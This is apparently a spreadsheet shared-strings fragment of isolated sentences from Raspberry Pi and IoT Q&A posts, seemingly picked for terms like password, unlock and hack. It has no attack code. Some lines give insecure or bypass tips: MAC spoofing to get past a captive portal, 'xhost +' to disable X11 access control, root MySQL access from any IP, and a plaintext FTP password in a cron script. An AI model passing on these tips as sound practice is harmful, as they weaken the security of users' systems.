    <t>(But if a slave connects to another it must login to another slave using the password, this means that I didn't share the ssh keygens between the slaves, but only between the master and the slaves.)</t>
  </si>
  <si>
    <t>Basically you spoof your MAC address on your computer, connect to wifi and agree to terms and conditions and then change your computer's MAC address back to your original and then connect your raspberrypi to the wifi.</t>
  </si>
  <si>
    <t>If you have a screen you can use to view the desktop, it's pretty easy, enter:
 (in to a terminal) navigate to interfacing options and you will be able to enable both SSH and VNC.</t>
  </si>
  <si>
    <t>Not everytime I enter a terminal or every time I login via ssh.</t>
  </si>
  <si>
    <t>Here's the relevant line of code, which is run from a .desktop configuration file accessed via the start menu:
I expect this to unload PIXELS, and then login on tty1 by entering the username on one line, and then the password on the next, and run the command 'emulationstation'.</t>
  </si>
  <si>
    <t>I am trying to increases the speed at which face recognition and detection happens for more real-time results and though of threading.</t>
  </si>
  <si>
    <t>Typically they are formed by taking the first letter of each word in a phrase (excluding connecting words like , and, for, etc), ex:
NASA - National Aeronautics and Space Administration  
SCRAM - Secure Continuous Remote Alcohol Monitor
MADD - Mothers Against Drunk Driving
TLD - Top Level Domain
Some acronyms will use additional letters from a word in order to create an acronym that sounds or looks more like a real word, or a pun.</t>
  </si>
  <si>
    <t>However, if I run this in the terminal window and try to enter an invalid character it errors as shown below.</t>
  </si>
  <si>
    <t>I have made change in cmdline.txt in micro SD card and add init=/bin/sh
but nothing happened and when boot OS agian request Login user name and password!</t>
  </si>
  <si>
    <t>Touch ID is Apple's technology for fingerprint scanning introduced with the iPhone 5s.</t>
  </si>
  <si>
    <t>Constituents of our current set up include:
1) A hardware device to read cards and send the unique code every time a card is processed.</t>
  </si>
  <si>
    <t>In the GPIO python library (which works fine in Python 2) there are callback functions for when a pin changes state, so I guess I'm hoping that there is a similar API for detecting keypress events.</t>
  </si>
  <si>
    <t>I will be creating multiples of each piece to head off any issues I would have with loss due to breakage or theft (due to these being rather unique playing pieces).</t>
  </si>
  <si>
    <t>Then, I am not able to enter the MySQL database with command 
neither using 
$ mysql -uroot -p
The only way to enter the database is to use (without any password)
$ sudo mysql -uroot 
In the last step of tutorial, when I have to select the database connection details, I don't know which password to use.</t>
  </si>
  <si>
    <t>Being only a mediocre RPi3 user/developer, with little hardware hacking experience, I was wondering if the RPi3 GPIOs could be directly connected to those input terminals and make me able to change the state of the device.</t>
  </si>
  <si>
    <t>I think the issue lies in giving the app privileges to access the camera, despite setting up the package.manifest file (won't let me embed the image, sorry).</t>
  </si>
  <si>
    <t>I would like to add an enter stroke to this code after autoboot to chromium:
a login screen come up and I would like it to hit enter so it will login to that webpage with the cached creds
not trying to download anything extra just want to know if theres a line I can add /etc/xdg/lxsession/LXDE-pi/autostart
@xest s off
@xset -dpms
@chromium-browser --kiosk&lt;URL&gt;</t>
  </si>
  <si>
    <t>A person on the Raspberry Pi forums solved a similar problem with tkinter:
A simple work around is to give root the proper authorization to use
  the X11 connection.</t>
  </si>
  <si>
    <t>If you issue this to a wrong device (like say pcm1p), you will see the following:
shell@android:/$: cat /proc/asound/card0/pcm1p/sub0/hw_params    
closed
Note :
Step 1 doesn't require phone to be rooted, How to Setup ADB.</t>
  </si>
  <si>
    <t>As Michael Gillett already wrote, the anti-collision identifier (frequently used as the ID in RFID), is dynamic and changes on each activation of the secure element in the iPhone.</t>
  </si>
  <si>
    <t>I recognize that this code won't solve the issue of characters being dropped, since it just ignores incomplete packets and you still rely on the validity of the checksum.</t>
  </si>
  <si>
    <t>Open new terminal and type command xhost+
now you have disabled the access control on your computer,
now do ssh login on raspberry pi using command **ssh -X  instead of just ssh ,now open the python-opencv application,it will work**</t>
  </si>
  <si>
    <t>You can change the access point parameters to one that visible in the range of ESP8266 alternatively you can change the access point SSID and password to one in the code.</t>
  </si>
  <si>
    <t>SecureTrading is the UK's leading independent payment processor enabling online transactions using credit and debit cards as well as methods such as Paypal and Ukash.</t>
  </si>
  <si>
    <t>In a MySql query, if a table name or an alias is not unique you will get the following error:
MySql Error #1066: Not unique table/alias: '%s'
The following query is not correct and will throw an error:
here we are joining yourtable with itself, but the same table name is used twice.</t>
  </si>
  <si>
    <t>URL Encoding, also known as Percent-encoding, is a mechanism for encoding information in a Uniform Resource Identifier (URI) under certain circumstances.</t>
  </si>
  <si>
    <t>In some popular payment types such as credit and debit cards, the security measures must comply with an industry standard and regulatory requirements.</t>
  </si>
  <si>
    <t>I have customized the kernel so that there's a  appearing with the appropriate permissions when plugging the webcam:
I've tried to build the following HALs against my AOSP tree but they all fail:
https://github.com/jollen/libv4l2-android:
fatal error: 'ui/CameraHardwareInterface.h' file not found
https://github.com/antmicro/android-camera-hal: 
error: use of undeclared identifier 'kMaxStride'
no member named 'I422ToABGRRow_NEON' in namespace 'libyuv'
https://github.com/aosp-mirror/platform_hardware_libhardware/tree/master/modules/camera/3_4
ninja: error: 'out/target/product/rpi3/obj/STATIC_LIBRARIES/libgtest_prod_intermediates/export_includes', needed by 'out/target/product/rpi3/obj/SHARED_LIBRARIES/camera.v4l2_intermediates/import_includes', missing and no known rule to make it 
To put it in a nutshell, how can I access a USB camera through the Android Camera API on the Raspberry Pi ?</t>
  </si>
  <si>
    <t>So, the best counter-measure you can do is change default logins, disable upnp if you don't need and, if you can do, disable login for common users (like root, admin, pi, ecc)
Adding some characters before your username (like changing pi to user_pi) can help you against dictionary attacks (pre-programmed username/password combinations), but an strong password is the best.</t>
  </si>
  <si>
    <t>To check if your word is valid, you compare it to a list of words that you find acceptable.</t>
  </si>
  <si>
    <t>I've traced the problem to be here:
I think is the problem because 
The UID: AB 3F 3E E9 has been assgined to Reader 0
Authenticating using key A...
PCD_Authenticate() failed:Timeout in communication.</t>
  </si>
  <si>
    <t>However, it can only recognize the last fingerprint which is assigned from the external source (SD card in my case).</t>
  </si>
  <si>
    <t>Many programs that interact with the user via the terminal need to ask the user for password values without showing what the user types on the screen.</t>
  </si>
  <si>
    <t>The problem I realized that SSH is not enabled by default in Pi3 and saw the posts which suggest to enable SSH by creating 'ssh' file inside /boot folder.</t>
  </si>
  <si>
    <t>I think that you will need more than what you are planning, if you touch the display nothing happens on the ssh or networking level, to do what you want to do you have to code an application as bridge between your input and your pc host that will do something specific for every kind of input that you want to check.</t>
  </si>
  <si>
    <t>However I know this is dangerous as there is a real risk of the SD card becoming corrupted if the power is pulled while data is being saved.</t>
  </si>
  <si>
    <t>I've looked a lot of places but no one seems to have had this problem before (or they could work around it by changing the privileges of other directories where they were accessing the sudo protected content).</t>
  </si>
  <si>
    <t>I was thinking about initializing a string after one user pressed the button that could work as some sort of session token but I have no idea if that can really work.</t>
  </si>
  <si>
    <t>You need to take into account that as soon as someone has direct access to the raspberry pi SD-Card he can easily get the root password as well as any password to your encryption solution as long as the password is saved on the card.</t>
  </si>
  <si>
    <t>Enumerating hardware devices is the best way to detect hardware, but they can come and go dynamically as the user plugs and unplugs them.</t>
  </si>
  <si>
    <t>You can use  to obscure the WiFi password, which would throw up a big (but not absolute*) obstacle to someone who grabbed the Pi, pulled out the SD card, and rummaged through it for sekret stuff.</t>
  </si>
  <si>
    <t>Log in to it, and run in Terminal
You'll need to enter your local pi password to allow your local Pi to access the remote one
On the other Pi
USER is your username on the remote Pi.</t>
  </si>
  <si>
    <t>The verifying of the finterprints happends via Raspberry Pi command (whom is initiated by a button press)
Logically, this means, when the button is pressed, the Raspberry Pi sends a 'validate' command to the Arduino, whom in return ask the Fingerprint scanner to run the validate command.</t>
  </si>
  <si>
    <t>A face detection and recognition algorithm.</t>
  </si>
  <si>
    <t>A word list generally contains a corpus of words that belong to the same language and cover an alphabetical range of words that appear in a dictionary
Word lists often occur in programming puzzles and student exercises, but are also used in brute force security attacks and spell checking applications.</t>
  </si>
  <si>
    <t>I have a barcode scanner, and currently, it is working as a keyboard so if the scanner successfully scans by pushing the trigger the scanned code goes to the computer as input.</t>
  </si>
  <si>
    <t>This mobile phone feature allows the user to disable (lock) the keys so that a number will not accidentally be dialed while the phone is in your pocket or purse.</t>
  </si>
  <si>
    <t>Here's what I have so far as it's just displaying the RFID tag once swiped.</t>
  </si>
  <si>
    <t>For example:
Like the mobile phone when you enter your sims pin.</t>
  </si>
  <si>
    <t>Is possible that PUTTY send a wrong password over the network?</t>
  </si>
  <si>
    <t>Here is the script now:
How can detect if escape is pressed without requiring a key to be pressed (e.g.</t>
  </si>
  <si>
    <t>I know there's a lot of similar questions where correcting the permissions seemed to work.</t>
  </si>
  <si>
    <t>I already tried to completely unlock my SIM-Card.</t>
  </si>
  <si>
    <t>In the while loop I'm reading from RFID module if a valid card are detected.</t>
  </si>
  <si>
    <t>I have researched a lot and it seems that this is not doable due to security reasons?</t>
  </si>
  <si>
    <t>I've tried changing my authentication back to Universal unencrypted, but that causes the other issue again.</t>
  </si>
  <si>
    <t>Since my router doesn't have an API, I need to use a webscraper or something similar in python to enter password, go to links, etc...</t>
  </si>
  <si>
    <t>I am facing an issue with being able to indirectly access the screens I am trying to block.</t>
  </si>
  <si>
    <t>Is there a way of allowing someone to enter whatever passcode they wanted to lock and unlock?</t>
  </si>
  <si>
    <t>I am sure this is some sort of permission or privilege issue, but I've run out of ideas.</t>
  </si>
  <si>
    <t>I wonder if someone has suggestions on how to solve this hopefully without editing qt mkspecs files and doing other such hacks.</t>
  </si>
  <si>
    <t>It doesn't have an encoding problem including other character value.</t>
  </si>
  <si>
    <t>All of the above works manually and even with a barcode scanner by scanning a QR code.</t>
  </si>
  <si>
    <t>I am currently working on a security system which i have to use some RFID cards to manage the access on a door.</t>
  </si>
  <si>
    <t>When a button on-screen is pressed on an Android phone, it runs a command via SSH on my Raspberry Pi on the same network.</t>
  </si>
  <si>
    <t>I have the controller's mac address hard coded into the slaves so that is not an issue.</t>
  </si>
  <si>
    <t>I thought I understood how the authentication was supposed to work, but I guess I was wrong.</t>
  </si>
  <si>
    <t>I'd like the password characters visible for this reason.</t>
  </si>
  <si>
    <t>Ultimately I solved this, but it does seem like a bit of a hack.</t>
  </si>
  <si>
    <t>LBP detector can be trained to recognise faces, too, but since you have no plans to use recognition, you can skip it.</t>
  </si>
  <si>
    <t>I bought a barcode scanner and I have the same problem me too.</t>
  </si>
  <si>
    <t>The phone also seems to display the anti-collision identifier (UID) to you.</t>
  </si>
  <si>
    <t>I did some work on trying to get MySQL running and think I must have altered something to corrupt my SD card during the process.</t>
  </si>
  <si>
    <t>The device was recognized and visible on the portal through an hdmi screen.</t>
  </si>
  <si>
    <t>I experienced similar issues when I wanted to connect my Rasperry Pi 2 with Raspbian Jessie Lite in a headless configuration for access using SSH from my Windows 10 PC with PuTTY.</t>
  </si>
  <si>
    <t>As you suspected, I think also that you are facing permission issue with your hardware on raspberry Pi.</t>
  </si>
  <si>
    <t>That means that if someone picks up the device and walks off with it, they can get your WiFi password.</t>
  </si>
  <si>
    <t>So if anyone is facing the problem that i was simply verify it by using REALTERM.</t>
  </si>
  <si>
    <t>If this doesn't work it probably has something to do with the fact that you're trying to do this over SSH, but that shouldn't necessarily be an issue.</t>
  </si>
  <si>
    <t>Than you could use Apples genial  systeme, to automatically detect your hardware.</t>
  </si>
  <si>
    <t>They are similar to techniques used in facial recognition.</t>
  </si>
  <si>
    <t>To decode characters encoded using Unicode</t>
  </si>
  <si>
    <t>GestPay is an online payment gateway for ecommerce that accept all cards and alternative payment systems like PayPal, Sofort, IDeal, Yandex, Qiwi, Alipay, UnionPay, Klarna.</t>
  </si>
  <si>
    <t>Apple's face recognition technology used in the iPhone X.</t>
  </si>
  <si>
    <t>In other contexts, a guid (globally-unique identifier) or uuid (universally-unique identifier) may be needed.</t>
  </si>
  <si>
    <t>Resetting a password changes it back to a previous value.</t>
  </si>
  <si>
    <t>An application of neural networks for supervised learning would be training a neural network for optical character recognition or handwriting recognition.</t>
  </si>
  <si>
    <t>Tethering over Wi-Fi, also known as Personal Hotspot, is available on iOS starting with iOS 4.2.5 (or later) on iPhone 4, 4S, 5, iPad (3rd generation), certain Windows Mobile 6.5 devices like the HTC HD2, Windows Phone 7 devices (varies by manufacturer and model), and certain Android phones (varies widely depending on carrier, manufacturer, and software version).</t>
  </si>
  <si>
    <t>I'm trying to get the google assistant sdk sample running on a pi but after receiving the authorization URL by using
I enter the code from the provided url and get this dump:
I checked this post which had a similar issue and updated my clock accordingly but that didn't seem to be the problem.</t>
  </si>
  <si>
    <t>For instance, if you are making a fingerprint detector, you know that the image can be rotated, so if you apply a transformation that makes the image invariant to the rotation (for instance you convert the image coordinates to polar representation) you will (usually) get better performances.</t>
  </si>
  <si>
    <t>Typically, a combination of a user name and a corresponding password will be used, since this allows access to be issued and revoked (as well as audit logging) on an individual basis, making a single person responsible for use and abuse of the password.</t>
  </si>
  <si>
    <t>Android Pay enables simple and secure purchases of physical goods and services in Android apps, and eliminates the need to manually enter payment and shipping information.</t>
  </si>
  <si>
    <t>Ultimately, the correct way of solving this problem is a kernel-mode driver - in which you can implement whatever finely grained security (or lack thereof) you wish.</t>
  </si>
  <si>
    <t>I don't want to enter password on git shell when I try to pull or push any changes to the server.</t>
  </si>
  <si>
    <t>In the screen all show good, but the file is corrupted (see https://i.stack.imgur.com/QHrQb.png).</t>
  </si>
  <si>
    <t>As I can guess from your first screenshot, you are using putty from a windows machine to ssh into your raspberry pi.</t>
  </si>
  <si>
    <t>The minutes can be entered by entering single digits.</t>
  </si>
  <si>
    <t>There are a couple of known issues on Shiny Server with Debian in general (you'll not that it's not officially supported), so Ubuntu is probably going to be an easier starting point, but there were a few other hacks I had to take along the way that I didn't record, unfortunately.</t>
  </si>
  <si>
    <t>The additional problem I had was that due to the incorrect information, the auto-generated certificate in the keystore was wrong, and since that had already been generated, the app was seeing the existing one and using that.</t>
  </si>
  <si>
    <t>The SocketScan Software Development Kit (SDK) enables developers to create custom applications with support for three types of barcode scanners:
Socket Bluetooth Cordless Hand Scanner (CHS) Series 7 - Handheld
Bluetooth barcode scanners provide commercial-grade rapid and robust
barcode scanning
Socket Bluetooth Cordless Hand Scanner (CHS) Series 8 - Small,
thin and attachable Bluetooth barcode scanners optimized for one-handed
use with smartphones.</t>
  </si>
  <si>
    <t>After that the user does click the next button, and it takes again a lot of time until the screen for the password is showed.</t>
  </si>
  <si>
    <t>All the webpages give 403 errors, and I cannot ssh in, and not even attempting to log in on the actual device using a monitor and keyboard (dead input I press keys and the login never pops up, the keyboard works).</t>
  </si>
  <si>
    <t>I'm using visual c++ in visual studio 2017 with opencv 4.1 to do the facial recognition, then sending the location of the identified face to an arduino via serial connection.</t>
  </si>
  <si>
    <t>The problem is, though a simple conventional SSH connection works perfectly, when I try to call "i2cset" from a python subprocess, it cannot find it because the ssh subprocess' PATH doesn't include the "/usr/sbin" folder that contains the "i2cset" command.</t>
  </si>
  <si>
    <t>Look at the  setting on the module -- 0 is for transparent serial, 1 is for API mode and 2 is for "escaped API mode" where certain characters are escaped to allow for easier detection of the start of a frame.</t>
  </si>
  <si>
    <t>After comically large amounts of googling and hassle I found a solution here: https://www.raspberrypi.org/blog/a-security-update-for-raspbian-pixel/
With the RPi3B and 11-01-2017 Raspbian Jessie combo (I dont know with which one the issue lies) one has to add a blank file named "ssh" into the boot directory of the SD card.</t>
  </si>
  <si>
    <t>Encoding
Encoding seems to be a good way to hide password, but in fact you can not really hide from someone who can access to the right user in the right server.</t>
  </si>
  <si>
    <t>Just make sure your raspberry pi is off, to avoid corrupting your SD Card (that's happened to me several times).</t>
  </si>
  <si>
    <t>), because my SHA1(Android Debug Key) fingerprint had changed (Again, makes no sense to me why, if anyone can explain, I'll be grateful), so I went to my Console and updated my fingerprint.</t>
  </si>
  <si>
    <t>If then connected, it swipes back to the left and shows the user to identify himself with a rfid card.</t>
  </si>
  <si>
    <t>If the users can literally only get to the touch screen, then I have a hard time imagining how they'd steal your software.</t>
  </si>
  <si>
    <t>Eggdrop, Supybot, or simply home-made applications)
One of the big loopholes in the IRC protocol as described by RFC1459 is that it does not specify the use of character encoding past the 7-bit ASCII representation.</t>
  </si>
  <si>
    <t>I'm really new to IoT, and I'm guessing it's probably a config problem (firewall, ...) ;
my computer is running Ubuntu 15.10 (Willy Werewolf) (I tried with the same results with a Windows 7 PC),
the network is encrypted by WPA, hosted by a XPeria U (I tried with other smartphone-hosted WPA networks with the same results),
the arduino WiFi shield with Uno board (bought less than 3 months ago so I'm guessing it's the latest version).</t>
  </si>
  <si>
    <t>I was going to add ssh key for the machine I ssh so I do not have to enter password every time, but when I hit ssh-keygen I got this prompt 
I decided to accept I thought it will create new file mentioned in parentheses, but I got message saying 
/Users/sanjeevkumar/.ssh/id_rsa already exists.</t>
  </si>
  <si>
    <t>it could be a full partition, a corrupted database that needs to be fixed, a failed copy/restore operation, some locks or wrong/corrupted permissions on the filesystem, etc.</t>
  </si>
  <si>
    <t>Its features include tokenization, part-of-speech tagging, dependency parsing, sentence boundary detection, named entity recognition and training of statistical neural network models.</t>
  </si>
  <si>
    <t>I have been writing a few programs for the raspberry pi camera, namely one that just shows the camera output, one that takes a picture and then applies face recognition and so on.</t>
  </si>
  <si>
    <t>You can try changing the baud rate while the port is open, but this may result in invalid characters being detected in the buffer (depending on the device and the protocol), which means you should also clear the buffers immediately after the change (using ).</t>
  </si>
  <si>
    <t>I only want to display the UID of the first RFID scanned.</t>
  </si>
  <si>
    <t>With this kind of codes, you might be encountering the similar issues.</t>
  </si>
  <si>
    <t>:
mysql -u root
mysql: unknown variable 'bind-address=0.0.0.0'
This is my users table:
MariaDB [(none)]&gt; select user, host, password from mysql.user;
+------+-----------+-------------------------------------------+
| user | host      | password                                  |
+------+-----------+-------------------------------------------+
| root | localhost | *054D119DEAD56E226D8356557796BFA72E71BA40 |
| root | %.%.%.%   | *054D119DEAD56E226D8356557796BFA72E71BA40 |
| root | %         | *054D119DEAD56E226D8356557796BFA72E71BA40 |
+------+-----------+-------------------------------------------+
How do I configure the server to allow local and remote access for root from any IP?</t>
  </si>
  <si>
    <t>It now broadcasts the expected SSID ("rspi"), but none of my wireless devices can connect to it because of wrong password, even though I check closely that the password I type to connect is 12341234.</t>
  </si>
  <si>
    <t>So if i have to connect my phone to the RPI, i dont have to login to RPI inorder to enter the PIN/Passkey.</t>
  </si>
  <si>
    <t>Here is the code :
i have given the wrong clientid as well as the username and password.</t>
  </si>
  <si>
    <t>However, I have figured out that Apple Pay generates a unique Identifier with each scan.</t>
  </si>
  <si>
    <t>Although your code use  where it should be username = 'sa', but I guess it is not the issue because you are getting a timeout.</t>
  </si>
  <si>
    <t>Using many tutorials online, I finally succeeded but have been encountering a serious problem: hostapd repeatedly announces "deauthenticated due to local deauth request" in /var/log/syslog.</t>
  </si>
  <si>
    <t>There is a form on this page and a barcode reader attached to the Pi which, when a barcode is scanned dumps the contents of the barcode into the textbox and simulates a carriage return (enter).</t>
  </si>
  <si>
    <t>Since the issue is that  isn't finding a display to connect to, we have two basic options: find and authenticate with an existing display, or make a new one.</t>
  </si>
  <si>
    <t>Here you have what would be the adapted version for this script
You may then change it to make it more suitable for you, or if needed add a second s.sendline() containing the pi password if it is asked, as you are using the sudo which normally prompts for a password.</t>
  </si>
  <si>
    <t>All but two of the characters in the username contained in followedBy.txt were obtained, then the Arduino code stopped dead.</t>
  </si>
  <si>
    <t>I am working on my raspberry pi server and whenever I clone or do anything on the gitremotely I want to disable password on the push and pull.</t>
  </si>
  <si>
    <t>Currently the problem is that I would like only one NFC tag to be able to unlock/lock the door, not just any.</t>
  </si>
  <si>
    <t>I am a newbie with python and opencv i am trying to build a face detection project with raspberry pi.</t>
  </si>
  <si>
    <t>I initially thought it would be character encoding issue but this does not seem to be the case.</t>
  </si>
  <si>
    <t>sh /bin/ihiu/boiler2text.sh
So far, it works nice, but I've hit some problems:
I need to have the script run 24/7 without having to SSH into the system.</t>
  </si>
  <si>
    <t>The ideal GUI I'm looking for would have connect, lock and unlock buttons that basically send data to the bluesmirf module and toggle a GPIO.</t>
  </si>
  <si>
    <t>This Is My Arduino Code:  
When I Enter "AAAA" in the Serial Monitor I should See Unlocked but instead i see... 
Is It Possible My Arduino Is Damaged?</t>
  </si>
  <si>
    <t>The log suggests it is a encoding problem in Python, my guess python is using ascii but the script file is using utf8.</t>
  </si>
  <si>
    <t>#bind-address           = 127.0.0.1   ###CHANGED
The permissions on all files inside the mysql folder are root.</t>
  </si>
  <si>
    <t>This is my program in QT to read my smart card reader firmware.</t>
  </si>
  <si>
    <t>I have an rfid reader which when scanned returns a UID as "backData"
I have my users (username and UID) stored in a text file.</t>
  </si>
  <si>
    <t>Will it always be true that a user with a barcode scanner will be able to out-run the hardware's ability to keep up?</t>
  </si>
  <si>
    <t>I have facial recognition working using opencv-node, but wanted to take it a step further.</t>
  </si>
  <si>
    <t>Code: 
Basically, what's happening once every 10 times, is that "string" is corrupt.</t>
  </si>
  <si>
    <t>Then, I tried reinstalling MySQL completely, but again, I was not prompted for a password.</t>
  </si>
  <si>
    <t>I'm on the very last section of my password changer, and for some reason it just won't change the password.</t>
  </si>
  <si>
    <t>im trying to do a face recognition with raspberryPi, im using Raspi 3b, with pi camera and python2.7.</t>
  </si>
  <si>
    <t>In fact, after I sshpass into my pi, it waits for me to enter a command in the terminal.</t>
  </si>
  <si>
    <t>But as the 'hacked' library solution does work without any problem I guess there is something else going on.</t>
  </si>
  <si>
    <t>I'm facing a connection issue from my IoT Edge device to its IoT Hub (apparently) as a result of an unauthorised access.</t>
  </si>
  <si>
    <t>I can run the face detection code for  single Pi camera  but not for multiple cameras integration board.</t>
  </si>
  <si>
    <t>We want to connect wifi through a shortcut of keyboard just pressing key from keyboard wifi listing appear.</t>
  </si>
  <si>
    <t>But it cannot detect my university id card which is also a rfid based card.</t>
  </si>
  <si>
    <t>But to get around the  dynamic ip on cell phone I want to go through my remote linux box/ssh tunnel so I have a static IP and a port with remserial again to go to with putty and can't get that to work.</t>
  </si>
  <si>
    <t>But I sounds like you are asking how to perform a soft reset using the watchdog.</t>
  </si>
  <si>
    <t>It sounds as though you would have to run the setup function again, to unlock the SIM and connect to the network.</t>
  </si>
  <si>
    <t>The Sd card can become corrupt due to all the writing that Raspian does all the time.</t>
  </si>
  <si>
    <t>Go to http://www.motobit.com/util/base64-decoder-encoder.asp and in the first textbox put your username and password using format: username:password, e.g.</t>
  </si>
  <si>
    <t>Each application profile has a unique profile identifier assigned by the ZigBee Alliance.</t>
  </si>
  <si>
    <t>Found the problem, I had changed the password for the RabbitMQ guest user.</t>
  </si>
  <si>
    <t>However, I'm not sure whether this is actually a solution or just a very dirty quick hack to localize the problem.</t>
  </si>
  <si>
    <t>I assume that you're using ESP-12 module that has 2 leds,
the problem you're facing may be from a corrupted firmware.</t>
  </si>
  <si>
    <t>Startup would need the password to be entered, but whoever takes the device (or the card) physically would not be able to learn the password.</t>
  </si>
  <si>
    <t xml:space="preserve">
I am trying to build a webcam based face detector using Raspberry pi as the base and Win 10 IOT as the OS.</t>
  </si>
  <si>
    <t>You need to enter   in the command line and then enter your password.</t>
  </si>
  <si>
    <t>Obviously that mode can/should only happen when the user has already entered the current password.</t>
  </si>
  <si>
    <t>Imagine this: You have a smart card with a secret key from a keypair generated on the card itself on it.</t>
  </si>
  <si>
    <t>Simply run the script with sudo...
eg - sudo python myscript.py
enter your password
It should now work..for testing purposes.</t>
  </si>
  <si>
    <t>It turns out raspberry pi does not automatically give openCV camera permission.</t>
  </si>
  <si>
    <t>My guess would be that you don't have the server setup to correctly require a password.</t>
  </si>
  <si>
    <t>This error was due to a bug in hardware detection step.</t>
  </si>
  <si>
    <t>It will give the result of changing name like this:
Change password.</t>
  </si>
  <si>
    <t>It wasn't a permission  issue, but using the Arduino IDE downloaded from their website solved my problem.</t>
  </si>
  <si>
    <t>RFC4122 issued by the IETF in 2005 is about "A Universally Unique IDentifier (UUID) URN Namespace"</t>
  </si>
  <si>
    <t>The debit card number is provided on the cards back.</t>
  </si>
  <si>
    <t>When entering a system, the request is usually assigned a unique Trace ID.</t>
  </si>
  <si>
    <t>When decoding a non-keyed archive, values have to be decoded in the same order in which they were encoded.</t>
  </si>
  <si>
    <t>I'm attempting to make a login script that will involve a MYSQL Database from xxamp along with PHP and Python combined, so if a user enters a password correctly, it will run a command "sudo python3 blink.py" or the script itself:
I'm not entirely sure if this is possible?</t>
  </si>
  <si>
    <t>Although the code relies on heavy image- processing even recent smartphones are capable of locating and decoding barcodes in real-time.</t>
  </si>
  <si>
    <t>You would think the image.verify() would make this unnecessary because it seems like verifying the "file" would require loading the image data in order to check its contents (according to that method's own documentation, which claims it "verifies the contents of a file").</t>
  </si>
  <si>
    <t>The new software keyboard works well (thanks google), but when pressing "next" on the login screens, the process takes an eternity.</t>
  </si>
  <si>
    <t>I had a similar problem, and this fixed it for me:
It looks like the google-auth-oauthlib dependency was out of date in my setup.</t>
  </si>
  <si>
    <t>The patented JPEG technology, RAJPEG, contributes to making this possible, as it allows access to any image data without decoding the whole image.</t>
  </si>
  <si>
    <t>You should use a cryptographichash functions that are is available in almost every web programming language, and thus is the best way to store a users password since it uses one-way encryption which means that no one can get the password back without first attempting to guess it repeatedly, also known as "bruteforcing".</t>
  </si>
  <si>
    <t>It is widely used in SIM cards (used in GSM mobile phones) and/or NFC secure elements, ATM cards (containing an EMV chip), and machine readable travel documents.</t>
  </si>
  <si>
    <t>can someone point me in the right direction a simple example would be appreciated all online research wants mysql etc 
all i want is a simple example as in enter name and submit i want that name to be logged so if name entered again it will say welcome back once i know this mechanism i can add all the other fields.</t>
  </si>
  <si>
    <t>I am basically looking for a programmable HID that will automatically type in a selected password when the device is inserted.</t>
  </si>
  <si>
    <t>I'm trying some well known AIDs, Apple Pay show up perfectly, I use TouchID to authorise the payment, but then the iPhone NFC controller replies with 6A 82 (File Not Found).</t>
  </si>
  <si>
    <t>Help me, please get to my database from the ESP module in C. I noticed that despite entering the password after the psql command I have to give it again, but I can not register the answer of the command line coming from the other side, for example "please enter password".</t>
  </si>
  <si>
    <t>it may be , or b'login:', or anything else, and that may change with updating your getty or similar binary, and Wireshark will help you localize your problem.</t>
  </si>
  <si>
    <t>I had this same problem and managed to solve by exporting the data to:
I made the login in mariadb like this:
I hope this help you!</t>
  </si>
  <si>
    <t>Problems with syntax or permissions
It's quite common to try to avoid any shell and symbol issues by putting a command in a file, but forgetting to chmod +x before adding the crontab entry.</t>
  </si>
  <si>
    <t>Payment gateways usually employ security mechanisms to pass the payment related information from customer to the merchant and from the merchant to the bank securely.</t>
  </si>
  <si>
    <t>Object detection has myriad applications, across many related computer-vision disciplines: content-based image retrieval (or cbir), optical character recognition (or ocr), image recognition, and automated video surveillance.</t>
  </si>
  <si>
    <t>I had a lot of troubles trying to install MySQL on rspbian stretch, 
so I ended up by deleting everything that has the word sql on it, I installed mysql-server back
But now I'm having this error when I try to log as root 
When I tried to start the server I had this error : 
Job for mariadb.service failed because the control process exited with error code.</t>
  </si>
  <si>
    <t>These include signup, login, email validation, password saving/salting, lost password, update to password, etc.</t>
  </si>
  <si>
    <t>So, my biggest problem is, that raspberry doesn't recognize my wifi.</t>
  </si>
  <si>
    <t>i also had the same problem i was locked out,
Solution:
close the pi
remove the sd card
then open the sd card on another linux based (ubuntu recommended) pc
(windows will not work)
open the terminal on the linux pc (make sure you are logged in as
root)
change directory to the cron job file called root  ,open it using
nano and comment out or delete the code.</t>
  </si>
  <si>
    <t>Speech recognition on handheld devices is usually triggered by a press of a button.</t>
  </si>
  <si>
    <t>The mistake is (almost certainly) due to a permission based problem.</t>
  </si>
  <si>
    <t>*/5 * * * * /home/pi/script.sh
My script contains a C++ program for capturing video for 5 seconds, then saving it to folder and sending it to server with :
#!/usr/bin/bash/env hbcxx #!/usr/bin/bash
  ./ca1
  ncftpput -R -v -u "user" -p "password" 192.168.0.119 /folder/ video/
My video recording program is:
The problem is cron just makes directory, but isn't making any file avi.</t>
  </si>
  <si>
    <t>Ideally, to my currently limited understanding, I would have a policy that has the user  as a variable:
If ultimately the cognito identifier is not an option for this policy, please advise me of what other identifier i would provide.</t>
  </si>
  <si>
    <t>The Arduino board saves a timestamp and RFID code to the ROM when an RFID tag is scanned.</t>
  </si>
  <si>
    <t>But even the phone code is the correct one, I have no idea how to get an access to the internal storage.</t>
  </si>
  <si>
    <t>WSO2 IoT 3.1.0 is released and we have fixed many issues in that including some authentication issues.</t>
  </si>
  <si>
    <t>The transaction log can also be used to recover accidentally changed or deleted data.</t>
  </si>
  <si>
    <t>EDIT #1: Haha, I just read over this and it sounds like a cell phone bomb from a terrorist movie.</t>
  </si>
  <si>
    <t>If I could see the 'standard' *nix file structure I could edit the relevant files to allow SSH access, but whenever I insert the card into my mac all I can see are files like
Where can I go from here?</t>
  </si>
  <si>
    <t>When I am running the face_detection example from the opencv processing example I get following error message:
Is this just my webcam not being recognized?</t>
  </si>
  <si>
    <t>I have installed KURA on my Raspberry Pi but my microSD card has been corrupted last week and I hade to re-install and re-configure KURA again after reformating the SD card.</t>
  </si>
  <si>
    <t>settings in config.txt, as provided by the LCD manufacturer, but dmesg would not reveal the hardware being recognized when booting the system.</t>
  </si>
  <si>
    <t>On the other hand, storing the manufacturer's SMTP credentials is a security flaw, because the hardware with physical access can be easily hacked.</t>
  </si>
  <si>
    <t>I have been using my Rpi for some time now using ssh with no problems until recently when i tried to login using the default password and it refused.</t>
  </si>
  <si>
    <t>I was wondering if it was possible to run a file from the command line by using sudo python file_name, but if I was trying to view the file I would have to enter some sort of password.</t>
  </si>
  <si>
    <t>The situation is the following:
The devices can correctly communicate and I can access the Arduino through SSH.</t>
  </si>
  <si>
    <t>For my current purposes, my problem is effectively solved because I don't actually need to work through SSH.</t>
  </si>
  <si>
    <t>But now i wanted to access the intenet so i have entered the command 
How to access to the internet?How to approach this problem?Any suggestions.</t>
  </si>
  <si>
